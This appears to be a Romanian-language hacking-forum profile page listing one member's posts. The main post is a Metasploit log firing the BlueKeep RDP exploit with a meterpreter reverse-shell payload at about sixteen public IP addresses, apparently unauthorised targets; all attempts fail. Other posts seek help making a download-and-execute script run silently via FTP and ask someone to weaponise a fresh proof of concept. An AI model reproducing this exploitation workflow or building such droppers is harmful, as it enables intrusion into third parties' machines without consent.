Jump to content

joeyjoe

Members
  • Content Count

    22
  • Joined

  • Last visited

Community Reputation

2 Neutral

About joeyjoe

  • Rank
    Member

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. poti sa te pisi pe el exploit, nu e bun de nimic msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LHOST 185.xxx.xxx.165 LHOST => 185.xxx.xxx.165 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set LPORT 4443 LPORT => 4443 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options Module options (exploit/windows/rdp/cve_2019_0708_bluekeep_rce): Name Current Setting Required Description ---- --------------- -------- ----------- RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random RDP_DOMAIN no The client domain name to report during connect RDP_USER no The username to report during connect, UNSET = random RHOSTS yes The target address range or CIDR identifier RPORT 3389 yes The target port (TCP) Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 185.xxx.xxx.165 yes The listen address (an interface may be specified) LPORT 4443 yes The listen port Exploit target: Id Name -- ---- 0 Automatic targeting via fingerprinting msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set TARGET 1 TARGET => 1 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOSTS 14.141.169.229 211.159.157.90 106.12.134.221 213.229.36.215 1.197.204.56 101.91.228.185 23.249.16.157 177.43.21 2.162 139.199.86.136 109.145.192.146 148.70.11.71 110.166.254.99 132.232.224.174 101.89.112.158 50.247.84.178 118.24.118.53 RHOSTS => 14.141.169.229 211.159.157.90 106.12.134.221 213.229.36.215 1.197.204.56 101.91.228.185 23.249.16.157 177.43.212.162 139.199.86.136 109.145.192.146 148.70.11.71 110.16 6.254.99 132.232.224.174 101.89.112.158 50.247.84.178 118.24.118.53 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run [*] Exploiting target 14.141.169.229 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 14.141.169.229:3389 - Detected RDP on 14.141.169.229:3389 (Windows version: 6.0.6003) (Requires NLA: No) [+] 14.141.169.229:3389 - The target is vulnerable. [*] 14.141.169.229:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 14.141.169.229:3389 - Surfing channels ... [*] 14.141.169.229:3389 - Lobbing eggs ... [-] 14.141.169.229:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 211.159.157.90 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 211.159.157.90:3389 - Detected RDP on 211.159.157.90:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 211.159.157.90:3389 - The target is vulnerable. [*] 211.159.157.90:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 211.159.157.90:3389 - Surfing channels ... [-] 211.159.157.90:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 106.12.134.221 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 106.12.134.221:3389 - Detected RDP on 106.12.134.221:3389 (Windows version: N/A) (Requires NLA: No) [*] 106.12.134.221:3389 - Cannot reliably check exploitability. [-] 106.12.134.221:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override [*] Exploiting target 213.229.36.215 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 213.229.36.215:3389 - Detected RDP on 213.229.36.215:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 213.229.36.215:3389 - The target is vulnerable. [*] 213.229.36.215:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 213.229.36.215:3389 - Surfing channels ... [*] 213.229.36.215:3389 - Lobbing eggs ... [-] 213.229.36.215:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 1.197.204.56 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 1.197.204.56:3389 - The target service is not running or refused our connection. [-] 1.197.204.56:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override [*] Exploiting target 101.91.228.185 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 101.91.228.185:3389 - Detected RDP on 101.91.228.185:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 101.91.228.185:3389 - The target is vulnerable. [*] 101.91.228.185:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 101.91.228.185:3389 - Surfing channels ... [*] 101.91.228.185:3389 - Lobbing eggs ... [-] 101.91.228.185:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 23.249.16.157 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 23.249.16.157:3389 - Detected RDP on 23.249.16.157:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 23.249.16.157:3389 - The target is vulnerable. [*] 23.249.16.157:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 23.249.16.157:3389 - Surfing channels ... [*] 23.249.16.157:3389 - Lobbing eggs ... [-] 23.249.16.157:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 177.43.212.162 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 177.43.212.162:3389 - Detected RDP on 177.43.212.162:3389 (Windows version: N/A) (Requires NLA: No) [+] 177.43.212.162:3389 - The target is vulnerable. [-] 177.43.212.162:3389 - Exploit failed: Msf::Exploit::Remote::RDP::RdpCommunicationError Msf::Exploit::Remote::RDP::RdpCommunicationError [*] Exploiting target 139.199.86.136 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 139.199.86.136:3389 - Detected RDP on 139.199.86.136:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 139.199.86.136:3389 - The target is vulnerable. [*] 139.199.86.136:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 139.199.86.136:3389 - Surfing channels ... [-] 139.199.86.136:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 109.145.192.146 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 109.145.192.146:3389 - Detected RDP on 109.145.192.146:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 109.145.192.146:3389 - The target is vulnerable. [*] 109.145.192.146:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 109.145.192.146:3389 - Surfing channels ... [*] 109.145.192.146:3389 - Lobbing eggs ... [-] 109.145.192.146:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 148.70.11.71 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 148.70.11.71:3389 - Detected RDP on 148.70.11.71:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 148.70.11.71:3389 - The target is vulnerable. [*] 148.70.11.71:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 148.70.11.71:3389 - Surfing channels ... [-] 148.70.11.71:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 110.166.254.99 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 110.166.254.99:3389 - Cannot reliably check exploitability. [-] 110.166.254.99:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override [*] Exploiting target 132.232.224.174 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 132.232.224.174:3389 - Cannot reliably check exploitability. [-] 132.232.224.174:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override [*] Exploiting target 101.89.112.158 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 101.89.112.158:3389 - Detected RDP on 101.89.112.158:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 101.89.112.158:3389 - The target is vulnerable. [*] 101.89.112.158:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 101.89.112.158:3389 - Surfing channels ... [-] 101.89.112.158:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 50.247.84.178 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 50.247.84.178:3389 - Detected RDP on 50.247.84.178:3389 (Windows version: 6.0.6002) (Requires NLA: No) [+] 50.247.84.178:3389 - The target is vulnerable. [*] 50.247.84.178:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 50.247.84.178:3389 - Surfing channels ... [*] 50.247.84.178:3389 - Lobbing eggs ... [-] 50.247.84.178:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploiting target 118.24.118.53 [*] Started reverse TCP handler on 185.xxx.xxx.165:4443 [*] 118.24.118.53:3389 - Detected RDP on 118.24.118.53:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 118.24.118.53:3389 - The target is vulnerable. [*] 118.24.118.53:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1. [*] 118.24.118.53:3389 - Surfing channels ... [-] 118.24.118.53:3389 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer [*] Exploit completed, but no session was created.
  2. este de 2 uni PoC-ul scos chiar 3 mai putin, cineva sa il faca exploit...
  3. am rezolvat problema cu download si execute dar acum nu stiu cum sa fac scriptu sa se execute silet, adica se deschide cmd.exe si se vede tot ce se face, eu as vrea silent
  4. ideea este de automatizare, o sa mai fac research, merci
  5. merci de raspuns, am incercat cu lcd, nu se mai deschide scriptu deloc scriptul postat de mine defineste un path, de unde se executa soft.msi, asa ca eu trebuie sa downloadez cu ftp soft.msi de ex in C:\ , de acolo scriptul meu executa soft.msi problema la mine este ca eu nu stiu cum sa downloadez softul cu ftp intr-un anume folder sugestii noi sunt bine venite
  6. am un script care execute un soft, problema mea este ca softul trebuie downloadat cu ftp sau wsh si nu stiu cum sa integrez metoda de download in script v-a rog ajutati-ma , am cautat tot google-ul , nu am reusit, multumesc.
  7. salut, am text asa: 11111111111111111111;X32rrsdcsdafs3242sdfsf 22222222222222222222;Lq4qdaasdaadkaoaaoasd 33333333333333333333;H141asd;asdalsjdaldajda vreau sa il fac asa: 11111111111111111111 X32rrsdcsdafs3242sdfsf 22222222222222222222 Lq4qdaasdaadkaoaaoasd 33333333333333333333 H141asd;asdalsjdaldajda am incercat google, tutoriale etc , ma bate rau regex in notepad ++ va rog daca cineva are timp sa ma ajute, multumesc anticipat.
  8. nu pot sa il postez pt ca e posibil sa fie integrat in el un exploit cu High Risk ce nu este public de la o companie foarte mare, cine vrea sa se uite peste el ii dau teamviewer
  9. Salut, am gasit un script scris in perl pe care nu il inteleg. Poate cineva sa ma ajute?
×
×
  • Create New...